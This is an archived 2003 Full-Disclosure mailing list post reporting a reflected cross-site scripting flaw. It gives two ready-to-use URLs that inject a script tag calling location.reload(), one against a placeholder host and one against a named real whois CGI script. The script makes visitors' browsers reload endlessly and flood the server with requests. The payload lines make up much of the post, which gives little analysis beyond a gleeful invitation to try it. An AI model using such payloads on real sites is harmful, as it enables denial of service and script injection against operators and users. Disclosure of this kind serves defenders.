[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] client attacks server - XSS

To: <full-disclosure@lists.netsys.com>, "0day" <0day@nothackers.org>
Subject: [Full-Disclosure] client attacks server - XSS
From: "morning_wood" <se_cur_ity@hotmail.com>
Date: Tue, 14 Oct 2003 11:05:04 +0530

huh, is this normal?

muhaaa-hehe!!!

this...

http://host/stupidscript?someoption=<script>javascript:location.reload()</script>

effectivly causes the client, to repeatedly reload
the page, sending never ending requests to the server, some sites
can do funny stuffts
like this...

http://ws.arin.net/cgi-bin/whois.pl?queryinput=<script>javascript:location.reload()</script>

give it a minute...


Oct 12, 2003
Donnie Werner
morning_wood@exploitlabs.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] client attacks server - XSS
  - From: Peter Moody <peter@ucsc.edu>

Prev by Date: Re: [Full-Disclosure] Friendly and secure desktop operating system
Next by Date: RE: [Full-Disclosure] Hacker suspect says his PC was hijacked
Previous by thread: Re: [Full-Disclosure] Friendly and secure desktop operating system
Next by thread: Re: [Full-Disclosure] client attacks server - XSS
Index(es):
- Date
- Thread